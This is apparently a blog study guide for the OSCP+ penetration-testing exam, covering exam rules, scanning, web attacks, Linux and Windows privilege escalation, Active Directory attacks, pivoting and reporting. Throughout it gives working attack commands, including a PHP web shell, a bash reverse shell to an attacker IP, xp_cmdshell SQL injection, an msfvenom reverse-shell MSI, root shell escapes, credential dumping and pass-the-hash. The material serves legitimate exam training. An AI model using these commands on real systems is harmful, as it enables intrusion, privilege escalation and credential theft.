The first shell usually feels smaller than you expected. A forgotten upload form, a weak service password, a writable SMB share, a low-privileged domain user, a misconfigured sudo rule. Nothing cinematic. Then the exam becomes the real work: enumerate without panicking, turn a foothold into proof, pivot without losing your route, chain one Active Directory permission into the next, and document every step well enough that another tester could reproduce it.
Welcome to PlainlySec. I’m Shota, and this is the OSCP+ 2026 master guide I would want open before the exam. It is written for authorized lab environments, PEN-200 practice, and the OSCP+ exam. Do not run these techniques against systems you do not own or have explicit permission to test.
One important correction before we begin: the current OSCP+ Active Directory set is not all-or-nothing. OffSec’s current guide lists the AD set as 40 total points split across three machines: 10 points, 10 points, and 20 points. You still need 70/100 to pass, but partial AD points can matter. The exam changed in late 2024: bonus points were removed, AD was updated to an assumed-breach model, and passing the updated exam awards OSCP and OSCP+.
Exam Architecture And Rules Of Engagement
The current OSCP+ structure is simple on paper and brutal in practice: three standalone machines worth 60 points total, plus one Active Directory set worth 40 points total. Each standalone is worth 20 points: 10 for initial access and 10 for privilege escalation. The AD set contains three machines and is scored as 10, 10, and 20 points.
Current OSCP+ exam scoring model: Standalone machine #1: 20 points - 10 initial access - 10 privilege escalation Standalone machine #2: 20 points - 10 initial access - 10 privilege escalation Standalone machine #3: 20 points - 10 initial access - 10 privilege escalation Active Directory set: 40 points - Machine #1: 10 points - Machine #2: 10 points - Machine #3 / DC path: 20 points Passing score: 70 / 100 Bonus points: removed
Do not build your strategy around myths. OffSec lists possible passing combinations that include full AD plus local flags, partial AD plus standalone progress, or a full standalone sweep with some AD progress. Your exact objectives are shown in the exam control panel. Read them when the exam starts.
Restrictions matter. AI chatbots and LLMs are prohibited. Commercial tools such as Burp Pro and Metasploit Pro are prohibited. Automatic exploitation tools and mass vulnerability scanners are prohibited. Nmap, Nmap scripts, Nikto, Burp Community, DirBuster-style content discovery, and similar manual-assist tools are allowed according to OffSec’s guide. Metasploit module use is restricted: using auxiliary, exploit, or post modules on multiple machines can disqualify points. Treat Metasploit as a last-resort single-target tool, not your workflow.
Exam safety rules to memorize: - No AI chatbots or LLM assistance during the exam - No commercial offensive tools - No automated exploitation tools like sqlmap - No mass vulnerability scanners like Nessus/OpenVAS - Burp Community is fine; Burp Pro is not - Nmap and NSE scripts are fine - Metasploit modules are restricted; avoid unless strategically necessary - Meterpreter on multiple machines can cost you points - Proofs must be collected from an interactive shell - Web-shell-only proof collection gets zero for that target
The 23h 45m Operating Plan
You do not need to be clever for twenty-four hours. You need to be consistent. Divide the exam into cycles: enumerate, attempt, document, move. Most failed attempts are not caused by lack of exploit knowledge; they are caused by spending six hours on one rabbit hole while easier points sit untouched.
Suggested exam rhythm: 00:00 - 00:30 Setup, VPN check, folders, note template, initial scans 00:30 - 03:30 Fast pass across every target; collect all obvious findings 03:30 - 08:00 Attack highest-confidence standalone or AD foothold path 08:00 - 12:00 Push AD hard if credentials exist; otherwise finish standalones 12:00 - 16:00 Pivot, privesc, second-order enumeration 16:00 - 20:00 Convert partials into proofs; stop chasing weak leads 20:00 - 22:30 Final exploitation attempts and cleanup screenshots 22:30 - 23:45 Verify flags submitted, screenshots, notes, commands, report outline
Create one folder per target before touching anything. Save scans, screenshots, payloads, exploit edits, and notes there. The report is easier when your evidence is already organized.
mkdir -p oscp/{ad,10.10.10.11,10.10.10.12,10.10.10.13,loot,screenshots,exploits}
cd oscp/10.10.10.11
script -a terminal.log
Phase I: Reconnaissance Without Wasting Time
Reconnaissance is not running one Nmap command and reading the output. It is building a service map, a technology map, an identity map, and an attack priority list. Your goal is to answer: what is exposed, what version is it, what can be accessed anonymously, what requires credentials, and what looks custom?
# Fast full TCP sweep nmap -p- --min-rate 1000 -T4 -oN nmap-allports.txt 10.10.X.X # Extract open ports quickly ports=$(grep -oP '\d+(?=/tcp\s+open)' nmap-allports.txt | paste -sd, -) echo $ports # Deep targeted scan nmap -p $ports -sC -sV -O -oA nmap-targeted 10.10.X.X # Safer UDP starter sweep sudo nmap -sU --top-ports 20 --max-retries 2 -oN nmap-udp-top.txt 10.10.X.X # Focused UDP checks sudo nmap -sU -p 53,69,123,161,500,1900 -sV -oN nmap-udp-focused.txt 10.10.X.X
TTL is a hint, not proof. TTL around 64 usually suggests Linux. TTL around 128 usually suggests Windows. Use it to guide your first assumptions, then confirm with service banners and behavior.
# Quick host fingerprint hints ping -c 1 10.10.X.X curl -I http://10.10.X.X/ smbclient -L //10.10.X.X -N nc -nv 10.10.X.X 22
Service Enumeration Cheat Sheet
Every open port deserves a short, structured pass. Do not jump straight to public exploits. First ask whether the service leaks users, files, versions, credentials, or write access.
# FTP 21 nmap -p21 --script ftp-anon,ftp-syst,ftp-bounce -sV 10.10.X.X ftp 10.10.X.X # SSH 22 nmap -p22 -sV --script ssh2-enum-algos 10.10.X.X hydra -L users.txt -P passwords.txt ssh://10.10.X.X -t 4 -V # only in labs where password attacks are allowed # DNS 53 dig @10.10.X.X domain.local axfr dig @10.10.X.X any domain.local dnsrecon -d domain.local -n 10.10.X.X # HTTP/HTTPS whatweb http://10.10.X.X nikto -h http://10.10.X.X curl -s http://10.10.X.X/robots.txt curl -s http://10.10.X.X/.git/config # SMB 139/445 smbclient -L //10.10.X.X -N smbmap -H 10.10.X.X enum4linux-ng -A 10.10.X.X nmap -p445 --script smb-enum-shares,smb-enum-users,smb-os-discovery 10.10.X.X # SNMP 161 onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.X.X snmpwalk -v2c -c public 10.10.X.X snmp-check 10.10.X.X -c public # NFS 2049 showmount -e 10.10.X.X sudo mount -t nfs 10.10.X.X:/share /mnt/nfs -o nolock # RPC 111 rpcinfo -p 10.10.X.X # MSSQL 1433 impacket-mssqlclient domain/user:password@10.10.X.X -windows-auth nmap -p1433 --script ms-sql-info,ms-sql-empty-password 10.10.X.X # WinRM 5985/5986 evil-winrm -i 10.10.X.X -u user -p 'password' evil-winrm -i 10.10.X.X -u user -H NTLMHASH
When credentials appear, immediately retry them everywhere sensible: SMB, WinRM, SSH, web admin panels, databases, and domain services. Password reuse is one of the most reliable exam patterns.
Web Initial Access: The OSCP Workhorse
Web applications are common because they test enumeration, logic, file handling, credentials, and command execution without requiring exotic memory exploitation. Treat every web app like a small investigation: identify stack, routes, parameters, upload points, auth boundaries, and hidden admin areas.
# Directory and file discovery ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \ -u http://10.10.X.X/FUZZ -ic -c -t 40 ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \ -u http://10.10.X.X/FUZZ -ic -c -t 40 # Extension fuzzing ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt \ -u http://10.10.X.X/FUZZ -e .php,.txt,.bak,.old,.zip,.conf -ic -c # Parameter discovery ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \ -u 'http://10.10.X.X/index.php?FUZZ=test' -fs 0 -ic # Virtual host fuzzing ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -H 'Host: FUZZ.domain.local' -u http://10.10.X.X -fs 1234 -ic
For LFI, prove read access first, then look for log poisoning, SSH key reads, configuration files, database credentials, and application source. Do not assume every LFI becomes RCE. Make the boring loot valuable.
# LFI test paths ../../../../../../etc/passwd ../../../../../../etc/hosts ../../../../../../proc/self/environ ../../../../../../var/log/apache2/access.log ../../../../../../var/www/html/config.php ../../../../../../home/user/.ssh/id_rsa # PHP filters for source disclosure php://filter/convert.base64-encode/resource=index.php php://filter/convert.base64-encode/resource=config.php # Decode locally echo 'BASE64_HERE' | base64 -d
For file upload, test extension filtering, MIME filtering, image processing, archive extraction, path traversal in filenames, and whether uploaded files execute. If PHP execution is blocked, an uploaded SSH key, web config file, or writable cron path may still matter.
# Simple PHP web shell for labs <?php system($_GET['cmd']); ?> # Bypass ideas to test manually shell.php shell.php5 shell.phtml shell.php.jpg shell.Php # If you can execute it curl 'http://10.10.X.X/uploads/shell.php?cmd=id' # Upgrade to reverse shell bash -c 'bash -i >& /dev/tcp/10.10.14.X/4444 0>&1'
SQL injection is allowed to test manually. Automated tools like sqlmap are prohibited. Learn enough manual SQLi to extract users, read files where permissions allow, and trigger command execution in MSSQL when you have the right privileges.
-- Basic SQLi probes ' OR '1'='1'-- ' OR 1=1-- - ' ORDER BY 1-- - ' UNION SELECT null,null,null-- - -- Time delay checks '; WAITFOR DELAY '00:00:05'-- -- MSSQL ' OR SLEEP(5)-- - -- MySQL '; SELECT pg_sleep(5)-- -- PostgreSQL -- MSSQL command execution path, when sysadmin rights exist '; EXEC xp_cmdshell 'whoami'-- '; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;-- '; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- '; EXEC xp_cmdshell 'powershell -enc BASE64_PAYLOAD'--
Shell Stabilization And File Transfer
A fragile shell costs time. Stabilize early, then choose the right transfer method for the target.
# Linux TTY upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
reset
# Listener
rlwrap -cAr nc -lvnp 4444
# Linux file transfer
python3 -m http.server 8000
wget http://10.10.14.X:8000/linpeas.sh -O /tmp/linpeas.sh
curl http://10.10.14.X:8000/linpeas.sh -o /tmp/linpeas.sh
# Windows file transfer
certutil -urlcache -f http://10.10.14.X:8000/winPEASx64.exe winpeas.exe
powershell -c "iwr http://10.10.14.X:8000/nc.exe -OutFile nc.exe"
# SMB transfer from Kali
impacket-smbserver share . -smb2support
copy \\10.10.14.X\share\tool.exe .
Linux Privilege Escalation
Linux privilege escalation is mostly configuration abuse. Run manual checks before relying on scripts. Scripts are useful for coverage, but the exam rewards understanding.
# Identity and system id whoami hostname uname -a cat /etc/os-release sudo -l # Users, groups, history cat /etc/passwd cat /etc/group ls -la /home find /home -type f -name ".*history" -maxdepth 3 2>/dev/null # Interesting files find / -perm -u=s -type f 2>/dev/null find / -writable -type d 2>/dev/null | grep -v proc find / -name '*.conf' -o -name '*.bak' -o -name '*.old' 2>/dev/null # Capabilities getcap -r / 2>/dev/null # Cron and timers cat /etc/crontab ls -la /etc/cron.* systemctl list-timers # Processes and ports ps auxww ss -tulpn netstat -tulpn 2>/dev/null
SUID binaries are a classic path. Compare anything unusual against GTFOBins from memory or your notes. Common winners include find, bash, cp, tar, vim, nano, nmap old interactive mode, env, and systemctl.
# SUID find example
find / -perm -u=s -type f 2>/dev/null
# If /usr/bin/find is SUID root
/usr/bin/find . -exec /bin/sh -p \; -quit
# If bash is SUID root
/bin/bash -p
# If python has SUID root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash -p")'
Sudo rules are often faster than exploits. Run sudo -l immediately after getting a Linux shell. If a command runs as root without a password, look for shell escapes, file writes, or environment abuse.
# Common sudo escapes
sudo vim -c ':set shell=/bin/sh' -c ':shell'
sudo less /etc/hosts
!/bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
sudo find . -exec /bin/sh \; -quit
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sudo python3 -c 'import os; os.system("/bin/sh")'
PATH hijacking appears when a root-executed script calls a binary without an absolute path. Writable scripts, writable directories in PATH, and cron jobs are your clues.
# Vulnerable root script contains: cp backup.tar /opt/backups/ echo '/bin/bash -p' > /tmp/cp chmod +x /tmp/cp export PATH=/tmp:$PATH sudo /path/to/vulnerable-script.sh
Capabilities are easy to miss. A binary with cap_setuid+ep can often become root.
getcap -r / 2>/dev/null
# Example if python has cap_setuid+ep
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Windows Privilege Escalation
Windows privesc is a checklist game: privileges, services, registry, stored credentials, scheduled tasks, AlwaysInstallElevated, writable paths, and reuse.
whoami /all hostname systeminfo ipconfig /all net user net localgroup administrators net localgroup "Remote Management Users" net localgroup "Remote Desktop Users" cmdkey /list dir /s /b *pass* *cred* *config* 2>nul dir /s /b *.kdbx *.txt *.ini *.config 2>nul reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
If both AlwaysInstallElevated registry keys are set to 1, a standard user can install an MSI as SYSTEM. This is noisy but effective in labs.
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # Kali msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.X LPORT=443 -f msi -o rev.msi # Target msiexec /quiet /qn /i rev.msi
Service misconfigurations are everywhere. Look for unquoted paths, writable service binaries, weak service permissions, and restart rights.
# Unquoted service paths wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\" # Service details sc qc SERVICE_NAME sc query SERVICE_NAME # Check permissions with accesschk if available accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv user SERVICE_NAME # Replace writable service binary, then restart sc stop SERVICE_NAME sc start SERVICE_NAME
Token impersonation depends on privileges. If you have SeImpersonatePrivilege as a service account, test modern Potato-family tools appropriate to the OS. Know that exploit reliability depends on Windows version and service context.
whoami /priv # If SeImpersonatePrivilege is enabled in a lab target PrintSpoofer.exe -i -c cmd.exe GodPotato.exe -cmd "cmd.exe /c whoami > C:\Windows\Temp\pwned.txt"
Do not ignore PowerShell history and saved credentials. They are often faster than kernel exploits.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt dir C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ cmdkey /list runas /savecred /user:Administrator cmd.exe
Active Directory: From Assumed Breach To Domain Compromise
The OSCP+ AD set begins from an assumed-breach perspective. You may receive a standard domain username and password. That means the first question is not “how do I get a domain user?” It is “what can this user see, access, and influence?”
# Confirm domain context from Linux/Kali crackmapexec smb 10.10.X.0/24 -u user -p 'Password123!' netexec smb 10.10.X.0/24 -u user -p 'Password123!' # Enumerate SMB shares with credentials smbmap -H 10.10.X.X -u user -p 'Password123!' -d domain.local smbclient -L //10.10.X.X -U 'domain.local/user%Password123!' # LDAP/domain enumeration ldapsearch -x -H ldap://10.10.X.X -D 'domain\user' -w 'Password123!' -b 'DC=domain,DC=local' # Kerberos user validation kerbrute userenum -d domain.local --dc 10.10.X.X users.txt
Run BloodHound collection as soon as you have valid credentials and network reachability to the domain controller. If BloodHound is too heavy for the moment, use targeted LDAP and SMB enumeration, but do not skip relationship mapping entirely.
# BloodHound Python ingestor from Kali bloodhound-python -u 'user' -p 'Password123!' -d domain.local -ns 10.10.X.X -c All # Common BloodHound edges to investigate GenericAll GenericWrite WriteDacl WriteOwner ForceChangePassword AddMember AllowedToDelegate CanPSRemote AdminTo HasSession
AS-REP roasting and Kerberoasting are core attacks because they can turn directory data into crackable material without a shell on the DC.
# AS-REP roasting: users without Kerberos pre-auth impacket-GetNPUsers domain.local/ -usersfile users.txt -format hashcat \ -outputfile asrep.hashes -dc-ip 10.10.X.X # With known credentials impacket-GetNPUsers domain.local/user:'Password123!' -request \ -format hashcat -outputfile asrep.hashes -dc-ip 10.10.X.X # Kerberoasting: service accounts with SPNs impacket-GetUserSPNs domain.local/user:'Password123!' -request \ -dc-ip 10.10.X.X -outputfile kerberoast.hashes # Crack hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --force hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --force
If you obtain NTLM hashes, do not reflexively crack them. Try pass-the-hash against SMB, WinRM, and WMI where appropriate.
# Pass-the-hash with WinRM evil-winrm -i 10.10.X.X -u Administrator -H NTLM_HASH # WMIExec impacket-wmiexec -hashes :NTLM_HASH domain.local/Administrator@10.10.X.X # SMBExec impacket-smbexec -hashes :NTLM_HASH domain.local/Administrator@10.10.X.X # Check local admin rights across hosts netexec smb 10.10.X.0/24 -u user -H NTLM_HASH --local-auth
Credential dumping is usually done after local administrator or SYSTEM access on a Windows host. In labs, dump only what you need and document the path. LSASS dumping, SAM dumping, and DPAPI secrets can all matter.
# SAM and SYSTEM from an elevated shell reg save HKLM\SAM C:\Windows\Temp\sam.save reg save HKLM\SYSTEM C:\Windows\Temp\system.save reg save HKLM\SECURITY C:\Windows\Temp\security.save # Parse on Kali impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL # Remote secretsdump with admin creds impacket-secretsdump domain.local/user:'Password123!'@10.10.X.X
Common AD escalation paths include password reuse, local admin on a second host, readable shares with scripts or passwords, service account roasting, ACL abuse, group membership abuse, and delegated access. The trick is to keep asking what the new credential gives you that the old one did not.
AD escalation loop: 1. Validate credential 2. Check SMB/WinRM access across hosts 3. Enumerate shares and readable files 4. Run BloodHound / update graph 5. Roast users and service accounts 6. Crack or pass hashes 7. Dump credentials from newly owned hosts 8. Repeat until the target objective is met
Pivoting With Ligolo-ng
Pivoting may be required. Ligolo-ng is popular because it creates a TUN interface and lets tools speak to internal subnets naturally. The workflow is clean: start the proxy on Kali, run the agent on the compromised host, start the session, add a route.
# Kali: create TUN interface sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up # Kali: start Ligolo proxy ./proxy -selfcert # Windows target agent.exe -connect 10.10.14.X:11601 -ignore-cert # Linux target chmod +x agent ./agent -connect 10.10.14.X:11601 -ignore-cert # Ligolo console session start # Kali: route internal subnet sudo ip route add 172.16.50.0/24 dev ligolo # Now scan through the tunnel nmap -Pn -sT -p 445,3389,5985 172.16.50.0/24
For double pivoting, add a listener through the first compromised host and connect the second agent back to that internal listener.
# In Ligolo while controlling Machine A listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 # Machine B connects to Machine A internal IP agent.exe -connect 172.16.50.10:11601 -ignore-cert # Start the new session, then add the next route sudo ip route add 172.16.60.0/24 dev ligolo
If Nmap behaves strangely over a pivot, use TCP connect scans with -sT and skip host discovery with -Pn. Keep scans focused. Full-port scans through pivots can waste hours.
Proofs, Screenshots, And Reporting
OffSec is strict about proof handling. The valid proof screenshot must show the proof file content from its original location in an interactive shell, plus the target IP address. Do not collect proof through a web file read, browser, or web shell and assume it counts.
# Linux proof screenshot command set whoami hostname ip addr cat /home/user/local.txt cat /root/proof.txt # Windows proof screenshot command set whoami hostname ipconfig type C:\Users\user\Desktop\local.txt type C:\Users\Administrator\Desktop\proof.txt
Your report must be reproducible. Include the successful commands, important output, exploit changes, shellcode generation commands where applicable, proof screenshots, and realistic remediation. If you modified public exploit code, include the original URL, the modified code, and the reason for each change.
Report section template: Target: IP address: Hostname: Objective: Vulnerability: Severity: Initial access summary: Privilege escalation summary: Step-by-step reproduction: Commands used: Evidence: Proof screenshot: Remediation: References:
Write notes as if your future tired self is the reader. “Got shell” is not a note. “Uploaded phtml shell through /admin/assets upload after changing Content-Type to image/jpeg, then executed cmd parameter” is a note.
The Final Checklist
Before the exam: [ ] Read the current OffSec OSCP+ Exam Guide [ ] Read the current OSCP+ Exam FAQ [ ] Prepare allowed tool list [ ] Prepare report template [ ] Prepare screenshot workflow [ ] Prepare note folders [ ] Test VPN, VM, clipboard, terminal logging [ ] Prepare wordlists and local man pages [ ] Practice AD assumed-breach labs [ ] Practice Ligolo routing During the exam: [ ] Submit every proof in the control panel [ ] Screenshot every proof correctly [ ] Save every scan output [ ] Record every successful command [ ] Avoid restricted tools [ ] Move on after 60-90 minutes of weak progress [ ] Re-enumerate after every new credential [ ] Keep report evidence organized
OSCP+ is not a magic trick. It is a test of method under fatigue. Enumerate deeply, exploit carefully, escalate patiently, pivot cleanly, and document like a professional. When you get stuck, return to the basics: ports, versions, files, credentials, permissions, paths, users, groups, services, shares, logs, and trust relationships.
You have the blueprint. The rest is repetition.
Official References Checked
This guide was aligned against OffSec’s current OSCP+ Exam Guide, OSCP+ Exam FAQ, OSCP exam changes article, and OSCP+ AD preparation article as publicly available in May 2026. Always read the official exam guide again immediately before your exam because rules can change.